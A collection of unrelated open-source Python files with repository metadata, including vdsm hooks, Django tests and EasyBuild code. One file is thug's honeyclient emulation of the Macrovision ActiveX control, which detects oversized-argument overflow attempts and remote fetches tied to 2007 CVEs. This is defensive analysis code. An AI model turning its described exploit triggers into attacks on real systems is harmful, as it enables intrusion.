return _runHooksDir(network_config_dict, 'after_network_setup_fail',
raiseError=False, hookType=_JSON_HOOK)
def before_get_vm_stats():
return _runHooksDir({}, 'before_get_vm_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_vm_stats(stats):
return _runHooksDir(stats, 'after_get_vm_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_get_all_vm_stats():
return _runHooksDir({}, 'before_get_all_vm_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_all_vm_stats(stats):
return _runHooksDir(stats, 'after_get_all_vm_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_get_caps():
return _runHooksDir({}, 'before_get_caps', raiseError=True,
hookType=_JSON_HOOK)
def after_get_caps(caps):
return _runHooksDir(caps, 'after_get_caps', raiseError=False,
hookType=_JSON_HOOK)
def before_get_stats():
return _runHooksDir({}, 'before_get_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_stats(caps):
return _runHooksDir(caps, 'after_get_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_ifcfg_write(hook_dict):
return _runHooksDir(hook_dict, 'before_ifcfg_write', raiseError=True,
hookType=_JSON_HOOK)
def after_ifcfg_write(hook_dict):
return _runHooksDir(hook_dict, 'after_ifcfg_write', raiseError=False,
hookType=_JSON_HOOK)
def after_hostdev_list_by_caps(devices):
return _runHooksDir(devices, 'after_hostdev_list_by_caps',
raiseError=False, hookType=_JSON_HOOK)
def _getScriptInfo(path):
try:
with open(path) as f:
md5 = hashlib.md5(f.read()).hexdigest()
    except (IOError, OSError):
md5 = ''
return {'md5': md5}
def _getHookInfo(dir):
return dict([(os.path.basename(script), _getScriptInfo(script))
for script in _scriptsPerDir(dir)])
def installed():
res = {}
for dir in os.listdir(P_VDSM_HOOKS):
inf = _getHookInfo(dir)
if inf:
res[dir] = inf
return res
if __name__ == '__main__':
def usage():
print('Usage: %s hook_name' % sys.argv[0])
sys.exit(1)
if len(sys.argv) >= 2:
globals()[sys.argv[1]](*sys.argv[2:])
else:
usage()
|
borisroman/vdsm
|
vdsm/hooks.py
|
Python
|
gpl-2.0
| 14,132
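For context, a hook under one of the P_VDSM_HOOKS directories is simply an executable file; _runHooksDir hands it the domain XML (or JSON payload) through the _hook_domxml/_hook_json environment variables, treats exit code 2 as a fatal error that stops the remaining hooks, and logs any higher code as unexpected. A hypothetical before_vm_start hook might look like this sketch (the file name and the XML tweak are illustrative, not from the source):

#!/usr/bin/python
# hypothetical hook script: .../hooks/before_vm_start/50_example
import os
import sys

# _runHooksDir sets this to a temp file holding the domain XML.
xml_path = os.environ['_hook_domxml']
with open(xml_path) as f:
    domxml = f.read()

# Modify the domain XML in place; vdsm reads the file back afterwards.
domxml = domxml.replace('<on_crash>destroy</on_crash>',
                        '<on_crash>preserve</on_crash>')
with open(xml_path, 'w') as f:
    f.write(domxml)

sys.exit(0)  # 0 = success; 2 aborts the whole hook chain; >2 is only logged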
|
# -*- coding: utf-8 -*-
#
from rest_framework import serializers
from common.utils import get_request_ip
from users.serializers.v2 import ServiceAccountSerializer
from ..models import Terminal
__all__ = ['TerminalSerializer', 'TerminalRegistrationSerializer']
class TerminalSerializer(serializers.ModelSerializer):
sa_serializer_class = ServiceAccountSerializer
sa_serializer = None
class Meta:
model = Terminal
fields = [
'id', 'name', 'remote_addr', 'command_storage',
'replay_storage', 'user', 'is_accepted', 'is_deleted',
'date_created', 'comment'
]
read_only_fields = ['id', 'remote_addr', 'user', 'date_created']
def is_valid(self, raise_exception=False):
valid = super().is_valid(raise_exception=raise_exception)
if not valid:
return valid
data = {'name': self.validated_data.get('name')}
kwargs = {'data': data}
if self.instance and self.instance.user:
kwargs['instance'] = self.instance.user
self.sa_serializer = ServiceAccountSerializer(**kwargs)
valid = self.sa_serializer.is_valid(raise_exception=True)
return valid
def save(self, **kwargs):
instance = super().save(**kwargs)
sa = self.sa_serializer.save()
instance.user = sa
instance.save()
return instance
def create(self, validated_data):
request = self.context.get('request')
instance = super().create(validated_data)
instance.is_accepted = True
if request:
instance.remote_addr = get_request_ip(request)
instance.save()
return instance
class TerminalRegistrationSerializer(serializers.Serializer):
name = serializers.CharField(max_length=128)
comment = serializers.CharField(max_length=128)
service_account = ServiceAccountSerializer(read_only=True)
|
liuzheng712/jumpserver
|
apps/terminal/serializers/v2.py
|
Python
|
gpl-2.0
| 1,920
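TerminalSerializer above follows a nested-save pattern: it validates a dependent ServiceAccountSerializer inside is_valid() and binds the created service account to the terminal in save(). A framework-free sketch of the same pattern, with all names illustrative rather than taken from the source:

class ServiceAccountStub(object):
    def __init__(self, data):
        self.data = data

    def is_valid(self):
        return bool(self.data.get('name'))

    def save(self):
        return {'username': self.data['name']}


class TerminalStub(object):
    def __init__(self, data):
        self.data = data
        self.sa = None

    def is_valid(self):
        # Derive the child payload from already-validated parent data.
        self.sa = ServiceAccountStub({'name': self.data.get('name')})
        return self.sa.is_valid()

    def save(self):
        instance = dict(self.data)
        instance['user'] = self.sa.save()  # attach the service account
        return instance


term = TerminalStub({'name': 'web-terminal-01'})
assert term.is_valid()
print(term.save())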
|
##
# Copyright 2009-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for CGAL, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.modules import get_software_root
from easybuild.tools.systemtools import get_shared_lib_ext
class EB_CGAL(CMakeMake):
"""Support for building CGAL."""
def configure_step(self):
"""Set some extra environment variables before configuring."""
deps = ["Boost", "GMP", "MPFR"]
for dep in deps:
if not get_software_root(dep):
raise EasyBuildError("Dependency module %s not loaded?", dep)
for lib in ["GMP", "MPFR"]:
os.environ['%s_INC_DIR' % lib] = "%s%s" % (get_software_root(lib), "/include/")
os.environ['%s_LIB_DIR' % lib] = "%s%s" % (get_software_root(lib), "/lib/")
os.environ['BOOST_ROOT'] = get_software_root("Boost")
super(EB_CGAL, self).configure_step()
def sanity_check_step(self):
"""Custom sanity check for CGAL."""
shlib_ext = get_shared_lib_ext()
libdirs = ('lib', 'lib64')
libs = [tuple(os.path.join(d, 'libCGAL%s.%s' % (l, shlib_ext)) for d in libdirs) for l in ['', '_Core']]
custom_paths = {
'files': ['bin/cgal_%s' % x for x in ['create_cmake_script', 'make_macosx_app']] + libs,
'dirs': ['include/CGAL', ('lib/CGAL', 'lib64/CGAL')],
}
super(EB_CGAL, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/easybuild-easyblocks
|
easybuild/easyblocks/c/cgal.py
|
Python
|
gpl-2.0
| 2,656
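configure_step above exports <LIB>_INC_DIR/<LIB>_LIB_DIR pairs plus BOOST_ROOT so that CMake's find modules can locate the dependencies. A standalone sketch of the same environment wiring, with the install prefixes as illustrative placeholders (in EasyBuild they come from get_software_root() for each loaded module):

import os

# Placeholder install prefixes, standing in for get_software_root() results.
software_roots = {'GMP': '/opt/gmp/6.1.2', 'MPFR': '/opt/mpfr/4.0.1'}

for lib, root in software_roots.items():
    os.environ['%s_INC_DIR' % lib] = os.path.join(root, 'include')
    os.environ['%s_LIB_DIR' % lib] = os.path.join(root, 'lib')

os.environ['BOOST_ROOT'] = '/opt/boost/1.65.1'  # placeholder path
print(os.environ['GMP_INC_DIR'])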
|
# MacrovisionJob, MacrovisionFlexNet
# CVE-2007-2419, CVE-2007-5660, CVE-2007-6654, CVE-2007-0321, CVE-2007-0328
import logging
log = logging.getLogger("Thug")
def Initialize(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Initialize')
def CreateJob(self, name, arg, job_id):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] CreateJob("{name}", "{arg}", "{job_id}")')
return self
def DownloadAndExecute(self, arg0, arg1, arg2, arg3, arg4):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] DownloadAndExecute('
f'"{arg0}", "{arg1}", "{arg2}", "{arg3}", "{arg4}")')
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute",
data = {
"arg" : arg0,
"arg1": arg1,
"arg2": arg2,
"arg3": arg3,
"arg4": arg4
},
forward = False)
if len(arg1) > 512:
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute overflow",
cve = "CVE-2007-2419, CVE-2007-6654")
log.ThugLogging.Shellcode.check_shellcode(arg1)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6654")
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg3}")
try:
self._window._navigator.fetch(arg3, redirect_type = "Macrovision Exploit")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Fetch failed')
def DownloadAndInstall(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] DownloadAndInstall')
def AddFileEx(self, arg0, arg1, arg2, arg3, arg4, arg5, arg6): # pylint:disable=unused-argument
if len(arg2) > 512:
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"AddFileEx overflow",
cve = "CVE-2007-2419")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.Shellcode.check_shellcode(arg2)
def AddFile(self, arg0, arg1):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] AddFile("{arg0}", "{arg1}")')
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg0}")
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"AddFile/Fetch from URL",
cve = "CVE-2007-2419",
forward = False,
data = {
"url": arg0,
"arg1": arg1
}
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
try:
self._window._navigator.fetch(arg0, redirect_type = "Macrovision Exploit 2")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Fetch failed')
def SetPriority(self, priority): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] SetPriority({priority})')
def SetNotifyFlags(self, flags): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] SetNotifyFlags({flags})')
def RunScheduledJobs(self): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] RunScheduledJobs()')
|
buffer/thug
|
thug/ActiveX/modules/MacrovisionFlexNet.py
|
Python
|
gpl-2.0
| 4,390
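The module above flags DownloadAndExecute/AddFileEx calls whose string arguments exceed 512 bytes, the trigger size it associates with the CVE-2007-2419 stack overflow. A toy standalone version of that length heuristic (the threshold mirrors the module; the shellcode analysis is deliberately left out):

OVERFLOW_THRESHOLD = 512  # argument length that suggests a buffer overflow

def looks_like_overflow(arg):
    return len(arg) > OVERFLOW_THRESHOLD

def check_call(method, args):
    """Return (method, argument index, length) for each oversized argument."""
    hits = []
    for i, arg in enumerate(args):
        if isinstance(arg, str) and looks_like_overflow(arg):
            hits.append((method, i, len(arg)))
    return hits

# A benign call versus an oversized argument typical of exploit pages.
print(check_call('DownloadAndExecute', ['job', 'xx', 'y', 'http://u', 'z']))
print(check_call('DownloadAndExecute', ['job', 'A' * 1024, 'y', 'u', 'z']))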
|
"""
Copyright 2016 Mellanox Technologies. All rights reserved.
Licensed under the GNU General Public License, version 2 as
published by the Free Software Foundation; see COPYING for details.
"""
__author__ = """
idosch@mellanox.com (Ido Schimmel)
"""
from lnst.Controller.Task import ctl
from TestLib import TestLib
from time import sleep
def check_itc_max_occ(tl, iface, itc):
err_msg = ""
for itc_iter in range(1, 8):
max_occ = tl.devlink_tc_max_occ_get(iface, True, itc_iter)
if max_occ != 0 and itc != itc_iter:
err_msg = "itc {0} occ isn't zero when should be".format(itc_iter)
break
elif max_occ == 0 and itc == itc_iter:
err_msg = "itc {0} occ is zero when shouldn't be".format(itc)
break
tl.custom(iface.get_host(), "itc occ test", err_msg)
def do_task(ctl, hosts, ifaces, aliases):
m1, m2, sw = hosts
m1_if1, m2_if1, sw_if1, sw_if2 = ifaces
m1_if1.reset(ip=["192.168.101.10/24", "2002::1/64"])
m2_if1.reset(ip=["192.168.101.11/24", "2002::2/64"])
sleep(30)
sw.create_bridge(slaves=[sw_if1, sw_if2], options={"vlan_filtering": 1})
sw_if1.add_br_vlan(10)
sw_if2.add_br_vlan(10)
tl = TestLib(ctl, aliases)
sw.enable_service("lldpad")
sw_if1.enable_lldp()
tl.lldp_ets_default_set(sw_if1, willing=False)
m1.enable_service("lldpad")
m1_if1.enable_lldp()
tl.lldp_ets_default_set(m1_if1)
tl.ping_simple(m1_if1, m2_if1)
for prio in range(1, 8):
tl.lldp_ets_up2tc_set(sw_if1, [(prio, prio)])
tl.devlink_clearmax(sw, sw_if1.get_devlink_name())
sleep(5) # lldpad's event loop runs every second.
tl.pktgen(m1_if1, m2_if1, m1_if1.get_mtu(), vlan_id=10, vlan_p=prio)
check_itc_max_occ(tl, sw_if1, prio)
tl.lldp_ets_up2tc_set(sw_if1, [(prio, 0)])
do_task(ctl, [ctl.get_host("machine1"),
ctl.get_host("machine2"),
ctl.get_host("switch")],
[ctl.get_host("machine1").get_interface("if1"),
ctl.get_host("machine2").get_interface("if1"),
ctl.get_host("switch").get_interface("if1"),
ctl.get_host("switch").get_interface("if2")],
ctl.get_aliases())
|
jiriprochazka/lnst
|
recipes/switchdev/qos-001-pg.py
|
Python
|
gpl-2.0
| 2,227
|
from django.contrib.auth.models import User, Group
from django.core.urlresolvers import reverse
from django.test import TestCase, Client
from blog.models import News, Resource, ResourceType, Tag
from community.models import Community
from users.models import SystersUser
class CommunityNewsListViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_list_view_no_news(self):
"""Test GET request to news list with an invalid community slug and
with a valid community slug, but no news"""
url = reverse('view_community_news_list', kwargs={'slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
def test_community_news_list_view_with_news(self):
"""Test GET request to news list with a single existing community
news."""
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_news_sidebar(self):
"""Test the presence or the lack of a news sidebar in the template"""
url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "News Actions")
self.assertNotContains(response, "Add news")
self.client.login(username="foo", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/snippets/news_sidebar.html')
self.assertContains(response, "News Actions")
self.assertContains(response, "Add news")
self.assertNotContains(response, "Edit current news")
self.assertNotContains(response, "Delete current news")
User.objects.create_user(username="baz", password="foobar")
self.client.login(username="baz", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "News Actions")
self.assertNotContains(response, "Add news")
class CommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_view(self):
"""Test GET request to view a single community news"""
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_news_sidebar(self):
"""Test the presence or the lack of the news sidebar in the template"""
self.client.login(username="foo", password="foobar")
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/snippets/news_sidebar.html')
self.assertContains(response, "News Actions")
self.assertContains(response, "Add news")
self.assertContains(response, "Edit current news")
self.assertContains(response, "Delete current news")
class AddCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_get_add_community_news(self):
"""Test GET create new community news"""
url = reverse('add_community_news', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'common/add_post.html')
new_user = User.objects.create_user(username="bar", password="foobar")
self.client.login(username='bar', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Manager")
new_user.groups.add(group)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_add_community_news(self):
"""Test POST create new community news"""
url = reverse('add_community_news', kwargs={'slug': 'foo'})
response = self.client.post(url, data={})
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data={"slug": "baz"})
self.assertEqual(response.status_code, 200)
data = {'slug': 'bar',
'title': 'Bar',
'content': "Rainbows and ponies"}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
news = News.objects.get()
self.assertEqual(news.title, 'Bar')
self.assertEqual(news.author, self.systers_user)
class EditCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.news = News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_edit_community_news_view(self):
"""Test GET to edit community news"""
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_edit_community_news_view(self):
"""Test POST to edit community news"""
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'foo'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
data = {'slug': 'another',
'title': 'Baz',
'content': "Rainbows and ponies"}
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
class DeleteCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_delete_community_news_view(self):
"""Test GET to confirm deletion of news"""
url = reverse("delete_community_news", kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Confirm to delete")
def test_post_delete_community_news_view(self):
"""Test POST to delete a community news"""
url = reverse("delete_community_news", kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url)
self.assertEqual(response.status_code, 302)
self.assertSequenceEqual(News.objects.all(), [])
class CommunityResourceListViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_list_view_no_resources(self):
"""Test GET request to resources list with an invalid community slug
and with a valid community slug, but no resources"""
url = reverse('view_community_resource_list', kwargs={'slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
def test_community_resource_list_view_with_resources(self):
"""Test GET request to resource list with a single existing community
resource."""
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
resource_type = ResourceType.objects.create(name="abc")
Resource.objects.create(slug="new", title="New",
author=self.systers_user,
content="New content!",
community=self.community,
resource_type=resource_type)
missing_param_url = url + "?type=cba"
response = self.client.get(missing_param_url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Types")
self.assertContains(response, "abc")
self.assertContains(response, "Bar")
self.assertContains(response, "New")
existing_param_url = url + "?type=abc"
response = self.client.get(existing_param_url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Types")
self.assertContains(response, "abc")
self.assertNotContains(response, "Bar")
self.assertContains(response, "New")
def test_community_resource_sidebar(self):
"""Test the presence or the lack of a resource sidebar in the
template"""
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Resource Actions")
self.assertNotContains(response, "Add resource")
self.client.login(username="foo", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response,
'blog/snippets/resources_sidebar.html')
self.assertContains(response, "Resource Actions")
self.assertContains(response, "Add resource")
self.assertNotContains(response, "Edit current resource")
self.assertNotContains(response, "Delete current resource")
User.objects.create_user(username="baz", password="foobar")
self.client.login(username="baz", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Resource Actions")
self.assertNotContains(response, "Add resource")
class CommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_resource_view(self):
"""Test GET request to view a community resource"""
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_resources_sidebar(self):
"""Test the presence or the lack of the resource sidebar in the
template"""
self.client.login(username="foo", password="foobar")
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response,
'blog/snippets/resources_sidebar.html')
self.assertContains(response, "Resource Actions")
self.assertContains(response, "Add resource")
self.assertContains(response, "Edit current resource")
self.assertContains(response, "Delete current resource")
class AddCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_get_add_community_resource(self):
"""Test GET create new community resource"""
url = reverse('add_community_resource', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'common/add_post.html')
new_user = User.objects.create_user(username="bar", password="foobar")
self.client.login(username='bar', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Manager")
new_user.groups.add(group)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_add_community_resource(self):
"""Test POST create new community resource"""
url = reverse('add_community_resource', kwargs={'slug': 'foo'})
response = self.client.post(url, data={})
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data={"slug": "baz"})
self.assertEqual(response.status_code, 200)
data = {'slug': 'bar',
'title': 'Bar',
'content': "Rainbows and ponies"}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
resource = Resource.objects.get()
self.assertEqual(resource.title, 'Bar')
self.assertEqual(resource.author, self.systers_user)
class EditCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.resource = Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_edit_community_resource_view(self):
"""Test GET to edit community resource"""
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_edit_community_resource_view(self):
"""Test POST to edit community resource"""
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'foo'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
data = {'slug': 'another',
'title': 'Baz',
'content': "Rainbows and ponies"}
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
class DeleteCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_delete_community_resource_view(self):
"""Test GET to confirm deletion of a resource"""
url = reverse("delete_community_resource",
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Confirm to delete")
def test_post_delete_community_resource_view(self):
"""Test POST to delete a community resource"""
url = reverse("delete_community_resource",
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url)
self.assertEqual(response.status_code, 302)
self.assertSequenceEqual(Resource.objects.all(), [])
class AddTagViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
def test_add_tag_view(self):
"""Test GET and POST requests to add a new tag"""
url = reverse("add_tag", kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Contributor")
self.systers_user.join_group(group)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.post(url, data={'name': 'Baz'})
self.assertEqual(response.status_code, 200)
self.assertEqual(Tag.objects.get().name, "Baz")
|
willingc/portal
|
systers_portal/blog/tests/test_views.py
|
Python
|
gpl-2.0
| 25,309
|
#
